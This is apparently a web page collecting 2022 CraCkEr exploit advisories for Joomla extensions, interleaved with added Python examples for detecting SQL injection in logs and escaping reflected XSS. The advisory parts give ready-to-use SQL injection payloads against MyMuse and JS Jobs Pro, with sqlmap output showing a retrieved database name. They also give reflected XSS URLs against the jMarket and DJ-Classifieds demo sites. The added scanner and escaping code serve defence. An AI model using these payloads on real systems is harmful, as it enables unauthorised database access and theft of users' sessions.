<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : Gordon Fisch - joomlamymuse.com │<br />│ Software : MyMuse 4.3.0 Extension for Joomla │<br />│ Vuln Type: SQL Injection │<br />│ Method : GET │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Typically used for remotely exploitable vulnerabilities that can lead to │<br />│ system compromise │<br />│ │<br />│ │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /index.php/en/mymuse-views/list-of-tracks?filter_alpha=A<br /><br />GET parameter 'filter_alpha' is vulnerable<br /><br />---<br />Parameter: filter_alpha (GET)<br /> Type: boolean-based blind<br /> Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)<br /> Payload: filter_alpha=A%' AND MAKE_SET(5052=5052,3360) AND 'xQKG%'='xQKG&filter_order=a.title ASC&limit=10&start=10<br /><br /> Type: error-based<br /> Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)<br /> Payload: filter_alpha=A%' AND EXTRACTVALUE(2078,CONCAT(0x5c,0x716a6b7671,(SELECT (ELT(2078=2078,1))),0x71627a7671)) AND 'QXSg%'='QXSg&filter_order=a.title ASC&limit=10&start=10<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: filter_alpha=A%' AND (SELECT 5976 FROM (SELECT(SLEEP(5)))vLkv) AND 'tLCw%'='tLCw&filter_order=a.title ASC&limit=10&start=10<br />---<br /><br /><br />[+] Starting the Attack<br /><br /><br />[INFO] the back-end DBMS is MySQL<br />web application technology: Apache<br />back-end DBMS: MySQL >= 5.1<br />[INFO] fetching current database<br />INFO] retrieved: '*********'<br />current database: ''*********''<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : Joom Sky - joomsky.com │<br />│ Software : JS Jobs Pro 1.3.6 JobPortal for Joomla │<br />│ Vuln Type: SQL Injection │<br />│ Method : POST │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Typically used for remotely exploitable vulnerabilities that can lead to │<br />│ system compromise │<br />│ │<br />│ │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /js-jobs/jm/pro/index.php/employer-control-panel/resume-search-results<br /><br /><br />POST parameter 'nationality' is vulnerable<br /><br />---<br />Parameter: nationality (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind - Parameter replace<br /> Payload: title=&name=&nationality=(CASE WHEN (5462=5462) THEN SLEEP(5) ELSE 5462 END)&gender=&jobcategory=&jobsubcategory=&jobtype=&currency=&jobsalaryrange=&heighestfinisheducation=&experiencemin=&experiencemax=&keywords=&submit_app=Resume Search&isresumesearch=1&view=resume&layout=resume_searchresults&uid=0&option=com_jsjobs&task11=view<br />---<br /><br /><br />[+] Starting the Attack<br /><br /><br />[INFO] the back-end DBMS is MySQL<br />web application technology: LiteSpeed<br />back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)<br />[INFO] fetching current database<br /><br />current database: 'demjomsk_jmjsjobs'<br /><br /><br />[-] Done<br /></code></pre>
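<p>Added example, not part of any of the CraCkEr advisories on this page. The four SQL injection findings above (JKassa ShoppingCart, JUX Charity Hub, MyMuse, JS Jobs Pro) are sqlmap runs that probe one parameter with <code>SLEEP()</code>, <code>EXTRACTVALUE()</code>, <code>MAKE_SET()</code>, <code>FLOOR(RAND())</code> and <code>OR n=n</code> constructs. The scanner below pulls the query string out of combined-format access log lines and reports, per source address and parameter, which technique family the request carried, so a run like these shows up while it is happening rather than after the database name has been read. The log lines, addresses and paths are constructed for the example, shaped on the advisories' payloads. Only GET parameters appear in such logs; a POST case like the JS Jobs one needs request-body logging or a WAF to see the same thing.</p>

```python
# Added example (not from the advisories): spotting sqlmap-style probes in
# combined-format access logs.
import re
from urllib.parse import parse_qsl, urlsplit

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# (technique family, pattern). The first three are strong on their own; a
# comment tail is only reported alongside one of them, because '#' or '--'
# also turn up in harmless values (colour codes, ranges).
INDICATORS = [
    ("time-based", re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor)\s*\(", re.I)),
    ("error-based", re.compile(r"\b(extractvalue|updatexml|make_set|floor\s*\(\s*rand)\s*\(", re.I)),
    ("boolean-based", re.compile(r"\b(and|or|when)\b\s*\(?\s*(\d+)\s*=\s*\2\b", re.I)),
    ("comment-tail", re.compile(r"--\s|#|/\*")),
]
STRONG = {"time-based", "error-based", "boolean-based"}


def classify(value: str) -> tuple:
    """Technique families whose signature appears in one parameter value."""
    return tuple(name for name, pattern in INDICATORS if pattern.search(value))


def scan_log(lines) -> list:
    """Return (ip, parameter, techniques) for every query parameter that
    carries at least one strong injection indicator."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            techniques = classify(value)
            if STRONG & set(techniques):
                hits.append((m.group("ip"), name, techniques))
    return hits


# Constructed access-log excerpt (combined format) shaped on the advisories.
SAMPLE_LOG = """\
203.0.113.5 - - [02/Oct/2022:10:15:01 +0000] "GET /shop/men/sweatshirts.feed?min_cost=25.6&max_cost=67.74&manufacturer=null)%20AND%20(SELECT%208420%20FROM%20(SELECT(SLEEP(5)))bIVQ)%20AND%20(1590=1590&type=atom HTTP/1.1" 200 512 "-" "sqlmap/1.6"
203.0.113.5 - - [02/Oct/2022:10:15:07 +0000] "GET /index.php/en/mymuse-views/list-of-tracks?filter_alpha=A%25%27%20AND%20EXTRACTVALUE(2078,CONCAT(0x5c,0x716a6b7671))%20AND%20%27QXSg%25%27=%27QXSg&limit=10 HTTP/1.1" 500 231 "-" "sqlmap/1.6"
198.51.100.7 - - [02/Oct/2022:10:16:00 +0000] "GET /index.php?option=com_jux_charity_hub&view=causes&title=-7388%27%20OR%202114=2114%23&goal_slider_lower=3000 HTTP/1.1" 200 8801 "-" "Mozilla/5.0"
192.0.2.9 - - [02/Oct/2022:10:16:30 +0000] "GET /shop/men/sweatshirts.feed?min_cost=25.6&max_cost=67.74&manufacturer=12&color=%23fff&type=atom HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""


if __name__ == "__main__":
    for ip, param, techniques in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{ip} param={param} techniques={','.join(techniques)}")
```

<p>The boolean pattern uses a backreference (<code>(\d+)\s*=\s*\2</code>) rather than a fixed <code>1=1</code>, because sqlmap picks a fresh random number for each run, as the <code>1590=1590</code> and <code>2114=2114</code> payloads above show. A single hit is a lead, not a conviction; the signal worth alerting on is one address producing several technique families against the same parameter within a short window.</p>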
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : Joobi │<br />│ Software : jMarket 5.15 Multi-Vendor Shopping Cart for Joomla │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ An attacker can send the victim a link containing a malicious URL in an email or │<br />│ instant message and perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />GET parameter 'controller' is vulnerable to XSS<br /><br />https://joomla.demo.joobi.org/index.php?option=com_jvouchers&controller=catalog-resultsqmzro%22onmouseover=%22alert(1)%22style=%22position:absolute;width:100%;height:100%;top:0;left:0;%22rqo95my69wy<br /><br />GET parameter 'trucs%5Bx%5D%5Bsearch%5D' is vulnerable to XSS<br /><br />https://joomla.demo.joobi.org/index.php?option=com_jvouchers&controller=catalog-results&task=query&wajx=1&wmjx=1&tmpl=component&type=raw&crtyid=12&trucs%5Bx%5D%5Bsearch%5D=gx3vt%20onfocus%3dalert(1)%20autofocus%3d%20itkrzsug7w5&trucs%5Bx%5D%5Bcatid%5D=28&option=com_jvouchers&Itemid=236&boxchecked=0&b92b3eff2e9146e306b474abafad73b4=zjg1&trucs%5Bs%5D%5Bftype%5D=0&trucs%5Bs%5D%5Bmid%5D=182&trucs%5Bs%5D%5Bpkey%5D=pid&trucs%5B182%5D%5Bpid%5D=0&trucs%5Bs%5D%5Bnew%5D=1&task_redirect=home&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fanZvdWNoZXJzJmNvbnRyb2xsZXI9Y2F0YWxvZy1yZXN1bHRzJnRhc2s9aG9tZSZJdGVtaWQ9MjM2JnNlYXJjaD1TZWFyY2guLi4mZm9ybWF0PWh0bWwmY2F0YWxvZ1NlYXJjaElucHV0U2l6ZT0xMDAlJmF1dG9zYXZlPTE%3D<br /><br />GET parameter 'vWjx' is vulnerable to XSS<br /><br 
/>https://joomla.demo.joobi.org/index.php?option=com_jvouchers&controller=catalog-results&task=home&wajx=1&wmjx=1&tmpl=component&type=raw&limitstartw44_a45a2eb907d344c4d11b95b39a363661=20&vWjx=sabif%20onmouseover%3dalert(1)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20ax650sfkaze&vWdjx=44&fRmjx=wf_catalog_results_catalog_search_results&trucs%5Bx%5D%5Bsearch%5D=Search...&choicesorting=newest&option=com_jvouchers&Itemid=236&boxchecked=0&b92b3eff2e9146e306b474abafad73b4=zjg1&trucs%5Bs%5D%5Bftype%5D=0&limitstartw44_a45a2eb907d344c4d11b95b39a363661=0&trucs%5Bs%5D%5Bnew%5D=1&task_redirect=home&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fanZvdWNoZXJzJmNvbnRyb2xsZXI9Y2F0YWxvZy1yZXN1bHRzJnRhc2s9aG9tZSZJdGVtaWQ9MjM2JnNlYXJjaD1TZWFyY2guLi4mZm9ybWF0PWh0bWw%3D<br /><br />GET parameter 'Itemid' is vulnerable to XSS<br /><br />https://joomla.demo.joobi.org/index.php?option=com_jvouchers&controller=catalog-results&task=query&wajx=1&wmjx=1&tmpl=component&type=raw&crtyid=12&trucs%5Bx%5D%5Bsearch%5D=Search...&trucs%5Bx%5D%5Bcatid%5D=28&option=com_jvouchers&Itemid=is9fk%20onfocus%3dalert(1)%20autofocus%3d%20f7adumy8lgl&boxchecked=0&b92b3eff2e9146e306b474abafad73b4=zjg1&trucs%5Bs%5D%5Bftype%5D=0&trucs%5Bs%5D%5Bmid%5D=182&trucs%5Bs%5D%5Bpkey%5D=pid&trucs%5B182%5D%5Bpid%5D=0&trucs%5Bs%5D%5Bnew%5D=1&task_redirect=home&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fanZvdWNoZXJzJmNvbnRyb2xsZXI9Y2F0YWxvZy1yZXN1bHRzJnRhc2s9aG9tZSZJdGVtaWQ9MjM2JnNlYXJjaD1TZWFyY2guLi4mZm9ybWF0PWh0bWwmY2F0YWxvZ1NlYXJjaElucHV0U2l6ZT0xMDAlJmF1dG9zYXZlPTE%3D<br /><br />GET parameter 'trucs%5B182%5D%5Bpid%5D' is vulnerable to XSS<br /><br 
/>https://joomla.demo.joobi.org/index.php?option=com_jvouchers&controller=catalog-results&task=query&wajx=1&wmjx=1&tmpl=component&type=raw&crtyid=12&trucs%5Bx%5D%5Bsearch%5D=Search...&trucs%5Bx%5D%5Bcatid%5D=28&option=com_jvouchers&Itemid=236&boxchecked=0&b92b3eff2e9146e306b474abafad73b4=zjg1&trucs%5Bs%5D%5Bftype%5D=0&trucs%5Bs%5D%5Bmid%5D=182&trucs%5Bs%5D%5Bpkey%5D=pid&trucs%5B182%5D%5Bpid%5D=ugb9n%20onmouseover%3dalert(1)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20zn67rnvkbhb&trucs%5Bs%5D%5Bnew%5D=1&task_redirect=home&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fanZvdWNoZXJzJmNvbnRyb2xsZXI9Y2F0YWxvZy1yZXN1bHRzJnRhc2s9aG9tZSZJdGVtaWQ9MjM2JnNlYXJjaD1TZWFyY2guLi4mZm9ybWF0PWh0bWwmY2F0YWxvZ1NlYXJjaElucHV0U2l6ZT0xMDAlJmF1dG9zYXZlPTE%3D<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : DJ-Extensions │<br />│ Software : DJ-Classifieds Ads 3.9 Extension for Joomla - Reflected XSS │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ An attacker can send the victim a link containing a malicious URL in an email or │<br />│ instant message and perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />GET parameter 'start' is vulnerable to XSS<br /><br />https://demo.dj-extensions.com/dj-classifieds-demo3/?start=6khflc"><img src=a onerror=alert(1)>hqr03<br /><br />GET parameter 'task' is vulnerable to XSS<br /><br />https://demo.dj-extensions.com/dj-classifieds-demo3/classifieds-front/category-blog-layout?task=parsesearchppbyq"><img src=a onerror=alert(1)>a8ex2<br /><br />GET parameter 'se' is vulnerable to XSS<br /><br />https://demo.dj-extensions.com/dj-classifieds-demo3/classifieds-front/category-blog-layout?se=ce3x1"><img src=a onerror=alert(1)>jlih5<br /><br />GET parameter 'se_radius_unit' is vulnerable to XSS<br /><br />https://demo.dj-extensions.com/dj-classifieds-demo3/classifieds-front/category-blog-layout?se=1&se_radius_unit=kmjqbjk"><img src=a onerror=alert(1)>cnrhh<br /><br />GET parameter 'se_radius' is vulnerable to XSS<br /><br />https://demo.dj-extensions.com/dj-classifieds-demo3/classifieds-front/category-blog-layout?se=1&se_radius_unit=km&se_radius=50k1yfg"><img src=a onerror=alert(1)>y1lp9<br /><br /><br /><br />[-] Done<br /></code></pre>
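<p>Added example, not part of the jMarket or DJ-Classifieds advisories above and not Joobi's or DJ-Extensions' code. Those reflected XSS findings take two shapes: a parameter echoed into HTML text, where <code>"&gt;&lt;img src=a onerror=...&gt;</code> closes the enclosing tag, and a parameter echoed into an attribute, where a stray quote or an unquoted value lets <code>onmouseover=</code> or <code>onfocus= autofocus</code> become a new attribute. The rendering below escapes for the context it writes into and always quotes attribute values; the audit then parses the result the way a browser would and reports any <code>on*</code> attribute or unexpected tag, which is a more honest check than grepping the output for the probe string. The form template and parameter names are assumptions for the example; the probes are shaped on the advisories' payloads.</p>

```python
# Added example (not the extensions' code): raw echo beside context-aware
# escaping, with a parser-based audit of the rendered markup.
import html
from html.parser import HTMLParser


def render_unsafe(params: dict) -> str:
    """The pattern behind the findings: request values echoed raw, one of
    them into an unquoted attribute."""
    search = params.get("search", "")
    start = params.get("start", "0")
    return (f'<input type="text" name="search" value={search}>'
            f'<a href="index.php?start={start}">next</a>')


def attr(value: str) -> str:
    """Attribute value: escape &, <, >, \" and ' and wrap in double quotes.
    The quoting is what stops 'x onmouseover=...' from becoming an attribute."""
    return '"' + html.escape(value, quote=True) + '"'


def text(value: str) -> str:
    """Text node: escape &, < and >; quotes are harmless here."""
    return html.escape(value, quote=False)


def render_safe(params: dict) -> str:
    search = params.get("search", "")
    start = params.get("start", "0")
    return (f"<input type=\"text\" name=\"search\" value={attr(search)}>"
            f"<a href={attr('index.php?start=' + start)}>next</a>"
            f"<p>Showing results for {text(search)}</p>")


class MarkupAudit(HTMLParser):
    """Collect start tags and any on* attribute names, as a browser would see them."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, _ in attrs:
            if name.startswith("on"):
                self.handlers.append((tag, name))


def audit(markup: str) -> dict:
    parser = MarkupAudit()
    parser.feed(markup)
    parser.close()
    return {"tags": parser.tags, "handlers": parser.handlers}


# Constructed probes in the shape of the advisories' payloads.
ATTR_PROBE = 'qmzro" onmouseover="alert(1)" style="position:absolute'
UNQUOTED_PROBE = "gx3vt onfocus=alert(1) autofocus= itkrzsug7w5"
TEXT_PROBE = '6khflc"><img src=a onerror=alert(1)>hqr03'


if __name__ == "__main__":
    for probe in (ATTR_PROBE, UNQUOTED_PROBE, TEXT_PROBE):
        print("unsafe:", audit(render_unsafe({"search": probe, "start": probe})))
        print("safe:  ", audit(render_safe({"search": probe, "start": probe})))
```

<p>Note that <code>html.escape</code> alone is not enough for the attribute case: the unquoted <code>value={search}</code> in <code>render_unsafe</code> would still accept <code>onfocus=alert(1)</code> even with <code>&lt;</code> and <code>&gt;</code> escaped, because a space is all it takes to start a new attribute. Escaping and quoting go together.</p>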